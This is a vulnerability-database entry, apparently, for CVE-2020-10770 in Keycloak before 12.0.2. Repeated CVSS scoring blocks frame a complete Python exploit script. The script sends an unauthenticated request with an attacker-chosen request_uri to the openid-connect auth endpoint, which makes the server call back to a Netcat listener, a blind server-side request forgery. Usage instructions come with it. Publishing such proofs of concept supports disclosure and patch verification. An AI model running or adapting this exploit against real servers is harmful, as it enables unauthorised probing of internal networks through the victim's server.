5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
# Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.keycloak.org/
# Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html
# Version: versions < 12.0.2
# Tested on: Kali Linux
# CVE : CVE-2020-10770
#!/usr/bin/env python3
import argparse, textwrap
import requests
import sys
parser = argparse.ArgumentParser(description="-=[Keycloak Blind SSRF test by ColdFusionX]=-", formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
./exploit.py -u http://127.0.0.1:8080
[^] Input Netcat host:port -> 192.168.0.1:4444
'''))
parser.add_argument("-u","--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)")
args = parser.parse_args()
if len(sys.argv) <= 2:
print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")
sys.exit()
# Variables
Host = args.url
r = requests.session()
def ssrf():
headerscontent = {
'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
}
hook = input("[^] Input Netcat host:port -> ")
_req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{hook}', headers = headerscontent)
return True
if __name__ == "__main__":
print ('\n[+] Keycloak Bind SSRF test by ColdFusionX \n ')
try:
if ssrf() == True:
print ('\n[+] BINGO! Check Netcat listener for HTTP callback :) \n ')
except Exception as ex:
print('\n[-] Invalid URL or Target not Vulnerable')
5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N